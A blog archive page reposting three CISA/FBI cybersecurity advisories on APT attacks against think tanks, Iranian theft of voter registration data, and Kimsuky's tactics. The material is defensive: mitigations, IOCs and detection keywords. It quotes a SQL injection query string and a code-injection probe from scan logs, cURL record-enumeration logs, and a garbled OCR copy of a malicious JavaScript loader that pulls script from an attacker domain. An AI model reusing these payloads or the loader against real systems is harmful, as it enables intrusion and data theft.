Tag Archive for: Persistent

Advanced Persistent Threat Actors Targeting U.S. Think Tanks

/in


This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[1] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.

APT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim’s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.

Given the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.

Click here for a PDF version of this report.

CISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.

Leaders

  • Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.

Users/Staff

  • Log off remote connections when not in use.
  • Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).
  • Use different passwords for corporate and personal accounts.
  • Install antivirus software on personal devices to automatically scan and quarantine suspicious files.
  • Employ strong multi-factor authentication for personal accounts, if available.
  • Exercise caution when:
    • Opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
    • Using removable media (e.g., USB thumb drives, external drives, CDs).

IT Staff/Cybersecurity Personnel

  • Segment and segregate networks and functions.
  • Change the default username and password of applications and appliances.
  • Employ strong multi-factor authentication for corporate accounts.
  • Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.
  • Apply encryption to data at rest and data in transit.
  • Use email security appliances to scan and remove malicious email attachments or links.
  • Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.
  • Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on Defending Against Malicious Cyber Activity Originating from Tor for mitigation options and additional information.
  • Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI’s Top 10 Routinely Exploited Vulnerabilities and other CISA alerts that identify vulnerabilities exploited by foreign attackers.
  • Implement an antivirus program and a formalized patch management process.
  • Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).
  • Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
  • Implement Group Policy Object and firewall rules.
  • Implement filters at the email gateway and block suspicious IP addresses at the firewall.
  • Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.
  • Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.
  • Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.
  • Disable or block unnecessary remote services.
  • Limit access to remote services through centrally managed concentrators.
  • Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.
  • Limit unnecessary lateral communications.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Ensure applications do not store sensitive data or credentials insecurely.
  • Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure any scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.
  • Visit the MITRE ATT&CK techniques and tactics pages linked in the ATT&CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.

Source…

Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

/in


This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020.  (Reference FBI FLASH message ME-000138-TT, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.

Click here for a PDF version of this report.

Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (Active Scanning: Vulnerability Scanning [T1595.002]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior. 

Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (Exploit Public-Facing Application [T1190]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites. 

CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video. 

CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (Compromise Infrastructure [T1584]) within a similar timeframe, use of IP addresses and IP ranges – including numerous virtual private network (VPN) service exit nodes – which correlate to this Iran APT actor (Gather Victim Host Information [T1592)]), and other investigative information. 

Reconnaissance

The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (Search Open Websites and Domains [T1539]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites. 

The FBI also has information indicating the actor researched  the following information in a suspected attempt to further their efforts to survey and exploit state election websites.

  • YOURLS exploit
  • Bypassing ModSecurity Web Application Firewall
  • Detecting Web Application Firewalls
  • SQLmap tool

Acunetix Scanning

CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (Active Scanning: Vulnerability Scanning [T1595.002]). 

The actor used the scanner to attempt SQL injection into various fields in /registration/registration/details with status codes 404 or 500:

/registration/registration/details?addresscity=-1 or 3*2<(0+5+513-513) -- &addressstreet1=xxxxx&btnbeginregistration=begin voter registration&btnnextelectionworkerinfo=next&btnnextpersonalinfo=next&btnnextresdetails=next&btnnextvoterinformation=next&btnsubmit=submit&chkageverno=on&chkageveryes=on&chkcitizenno=on&chkcitizenyes=on&chkdisabledvoter=on&chkelectionworker=on&chkresprivate=1&chkstatecancel=on&dlnumber=1&dob=xxxx/x/x&[email protected]&firstname=xxxxx&gender=radio&hdnaddresscity=&hdngender=&last4ssn=xxxxx&lastname=xxxxxinjjeuee&[email protected]&[email protected]&[email protected]&[email protected]&mailaddressstate=aa&[email protected]&[email protected]&middlename=xxxxx&overseas=1&partycode=a&phoneno1=xxx-xxx-xxxx&phoneno2=xxx-xxx-xxxx&radio=consent&statecancelcity=xxxxxxx&statecancelcountry=usa&statecancelstate=XXaa&statecancelzip=xxxxx&statecancelzipext=xxxxx&suffixname=esq&[email protected]

Requests

The actor used the following requests associated with this scanning activity.

2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0

2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375

2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x 

User Agents Observed

CISA and FBI have observed the following user agents associated with this scanning activity.

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0 

Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4 

Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17

Exfiltration

Obtaining Voter Registration Data

Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [Gather Victim Identity Information (T1589)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.
Requests

The actor used the following requests.

2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406

2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625

2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

Note: incrementing voterid values in cs_uri_query field

User Agents

CISA and FBI have observed the following user agents.

FDM+3.x

curl/7.55.1

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0 
Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4

See figure 1 below for a timeline of the actor’s malicious activity.

Figure 1: Overview of malicious activity

Detection

Acunetix Scanning

Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.

  • $acunetix
  • acunetix_wvs_security_test

Indicators of Compromise

For a downloadable copy of IOCs, see AA20-304A.stix.

Disclaimer: Many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. Although this creates the potential for false positives, any activity listed should warrant further investigation. The actor likely uses various IP addresses and VPN services.

The following IPs have been associated with this activity.

  • 102.129.239[.]185 (Acunetix Scanning)
  • 143.244.38[.]60 (Acunetix Scanning and cURL requests)
  • 45.139.49[.]228 (Acunetix Scanning)
  • 156.146.54[.]90 (Acunetix Scanning)
  • 109.202.111[.]236 (cURL requests)
  • 185.77.248[.]17 (cURL requests)
  • 217.138.211[.]249 (cURL requests)
  • 217.146.82[.]207 (cURL requests)
  • 37.235.103[.]85 (cURL requests)
  • 37.235.98[.]64 (cURL requests)
  • 70.32.5[.]96 (cURL requests)
  • 70.32.6[.]20 (cURL requests)
  • 70.32.6[.]8 (cURL requests)
  • 70.32.6[.]97 (cURL requests)
  • 70.32.6[.]98 (cURL requests)
  • 77.243.191[.]21 (cURL requests and FDM+3.x (Free Download Manager v3) enumeration/iteration)
  • 92.223.89[.]73 (cURL requests)

CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.

  • 195.181.170[.]244 (Observed September 30 and October 20, 2020)
  • 102.129.239[.]185 (Observed September 30, 2020)
  • 104.206.13[.]27 (Observed September 30, 2020)
  • 154.16.93[.]125 (Observed September 30, 2020)
  • 185.191.207[.]169 (Observed September 30, 2020)
  • 185.191.207[.]52 (Observed September 30, 2020)
  • 194.127.172[.]98 (Observed September 30, 2020)
  • 194.35.233[.]83 (Observed September 30, 2020)
  • 198.147.23[.]147 (Observed September 30, 2020)
  • 198.16.66[.]139(Observed September 30, 2020)
  • 212.102.45[.]3 (Observed September 30, 2020)
  • 212.102.45[.]58 (Observed September 30, 2020)
  • 31.168.98[.]73 (Observed September 30, 2020)
  • 37.120.204[.]156 (Observed September 30, 2020)
  • 5.160.253[.]50 (Observed September 30, 2020)
  • 5.253.204[.]74 (Observed September 30, 2020)
  • 64.44.81[.]68 (Observed September 30, 2020)
  • 84.17.45[.]218 (Observed September 30, 2020)
  • 89.187.182[.]106 (Observed September 30, 2020)
  • 89.187.182[.]111 (Observed September 30, 2020)
  • 89.34.98[.]114 (Observed September 30, 2020)
  • 89.44.201[.]211 (Observed September 30, 2020)

Recommendations

The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors: 

  • Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.
  • Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.
  • Enable strong password requirements and account lockout policies to defend against brute-force attacks.
  • Apply multi-factor authentication, when possible.
  • Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.
  • Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure third parties that require RDP access follow internal remote access policies.
  • Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
  • Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as a VPNs. However, recognize the security of VPNs matches the security of the connected devices.
  • Use security features provided by social media platforms; use strong passwords, change passwords frequently, and use a different password for each social media account. 
  • See CISA’s Tip on Best Practices for Securing Election Systems for more information. 

General Mitigations

Keep applications and systems updated and patched

Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed of threat actors to create new exploits following the release of  a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. Additionally, use tools (e.g., the OWASP Dependency-Check Project tool ) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.

Scan web applications for SQL injection and other common web vulnerabilities

Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.

Deploy a web application firewall  

Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools. 

Deploy techniques to protect against web shells

Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools. 

Use multi-factor authentication for administrator accounts

Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.

Remediate critical web application security risks

First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.  

How do I respond to unauthorized access to election-related systems?

Implement your security incident response and business continuity plan

It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

Contact CISA or law enforcement immediately 

To report an intrusion and to request incident response resources or technical assistance, contact CISA ([email protected] or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division ([email protected] or 855-292-3937).

Resources

 

Source…

North Korean Advanced Persistent Threat Focus: Kimsuky

/in


This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group Kimsuky—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.

This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.

Click here for a PDF version of this report.

Key Findings

This advisory’s key findings are:

  • The Kimsuky APT group has most likely been operating since 2012.
  • Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
  • Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[1],[2]
  • Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[3]
  • Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
  • Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
  • Kimsuky specifically targets:
    • Individuals identified as experts in various fields,
    • Think tanks, and
    • South Korean government entities.[4],[5],[6],[7],[8]
  • CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.

Initial Access

Kimsuky uses various spearphishing and social engineering methods to obtain Initial Access [TA0001] to victim networks.[9],[10],[11] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [T1566.001]).[12],[13]

  • The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
  • Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
    • Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
    • After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
  • Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[15],[16],[17]

Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (Phishing: Spearphising Link [T1566.002], Drive-by Compromise [T1189], Man-in-the-Browser [T1185]).[18]

Execution

After obtaining initial access, Kimsuky uses BabyShark malware and PowerShell or the Windows Command Shell for Execution [TA0002].

  • BabyShark is Visual Basic Script (VBS)-based malware.
    • First, the compromised host system uses the native Microsoft Windows utility, mshta.exe, to download and execute an HTML application (HTA) file from a remote system (Signed Binary Proxy Execution: Mshta [T1218.005]).
    • The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
    • The script maintains Persistence [TA0003] by creating a Registry key that runs on startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]).
    •  It then collects system information (System Information Discovery [T1082]), sends it to the operator’s command control (C2) servers, and awaits further commands.[19],[20],[21],[22]
  • Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (Phishing: Spearphising Link [T1566.002], Phishing: Spearphishing Attachment [T1566.001]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[23]
  • Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (Command and Scripting Interpreter: PowerShell [T1059.001]). PowerShell commands/scripts can be executed without invoking powershell.exe through HTA files or mshta.exe.[24],[25],[26],[27]

Persistence

Kimsuky has demonstrated the ability to establish Persistence [TA0003] through using malicious browser extensions, modifying system processes, manipulating the autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.

  • In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (Man-in-the-Browser [T1185]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[28]
  • Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (Boot or Logon Autostart Execution [T1547]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[29],[30]
  • During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (Remote Services: Remote Desktop Protocol [T1021.001]).[31]
  • Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (.hwp files) in the Registry (Event Triggered Execution: Change Default File Association [T1546.001]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[32] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly.[33]
  • Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (Server Software Component: Web Shell [T1505.003]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]

Privilege Escalation

Kimsuky uses well-known methods for Privilege Escalation [TA0004]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in explorer.exe.

  • Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into explorer.exe (Process Injection [T1055]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., dfe8b437dd7c417a6d.tmp) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[35]
  • Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within explorer.exe (Process Injection [T1055]).[36]

Figure 1: Privileges set for the injection [37]

Defense Evasion

Kimsuky uses well-known and widely available methods for Defense Evasion [TA0005] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[38],[39]

  • Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (Impair Defenses: Disable or Modify System Firewall [T1562.004]).[40]

Machine generated alternative text: 1 2 3 4 5 6 7 8 9 lø SYSTEMCurrentControlSetServicesSharedAccessParameters Fi rewal i cyStandardProfi le SYSTEMCurrentControlSetServicesSharedAccessParameters Fi rewal icyPublicProfile HKLMSOFTWAREAhnLabV31S2ØØ71nternetSec FWRunMode ø HKLMSOFTWAREAhn1abV31S8Øis fwmode ø

Figure 2: Disabled firewall values in the Registry [41]

  • Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (Indicator Removal on Host: File Deletion [T1070.004]).[42]
  • Kimsuky has used mshta.exe, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious .hta files and JavaScript or VBS through a trusted windows utility (Signed Binary Proxy Execution: Mshta [T1218.005]). It can also be used to bypass application allow listing solutions (Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]).[43],[44]
  • Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (Process Injection [T1055]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[45],[46],[47]

Credential Access

Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (Credential Access [TA0006]).

  • Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses ProcDump, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (OS Credential Dumping [T1003]). ProcDump monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware.[48]
  • According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (Man-in-the-Browser [T1185]).[49],[50] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51]

Machine generated alternative text: var Jqmin — function() var , e createHttp(); if (null e) try "https : / bizsonet.com/wp-admin/j s/jquery . j s" , e. open ( "get" , "applicationrx-www-forn-urlencoced"), e. send() catch (e) return e.responseText return i function Var : if ( ! e) var document. get ElementsByTagName( " s c ript " ) ; t. length) (var a O; a t. length; a++) ttal.id (e 28) r document. createäement( "script"); "text/ javascript", r. type r. id i, r.src "https://"•øx.bizsonet.cor/wp-adrin/js/jquery-3.3.I.rin.js", document . getE1ementsByTagName( " head" ) . appendChi1d (r)

Figure 3: JavaScript file, named jQuery.js [52]

  • Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (Input Capture: Keylogging [T1056.001], Network Sniffing [T1040]). MECHANICAL logs keystrokes to %userprofile%appdataroamingapach.{txt,log} and is also a “cryptojacker,” which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[53]
  • Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]

Discovery

Kimsuky enumerates system information and the file structure for victims’ computers and networks (Discovery [TA0007]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (File and Directory Discovery [T1083]). The information is directed to C:WINDOWSmsdatl3.inc, read by malware, and likely emailed to the malware’s command server.[55]

Collection

Kimsuky collects data from the victim system through its HWP document malware and its keylogger (Collection [TA0009]). The HWP document malware changes the default program association in the Registry to open HWP documents (Event Triggered Execution: Change Default File Association [T1546.001]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to C:Program FilesCommon FilesSystemOle DBmsolui80.inc and records the active window name where the user pressed keys (Input Capture: Keylogging [T1056.001]). There is another keylogger variant that logs keystrokes into C:WINDOWSsetup.log.[56]

Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4).

Figure 4: Python Script targeting MacOS [57]

Command and Control

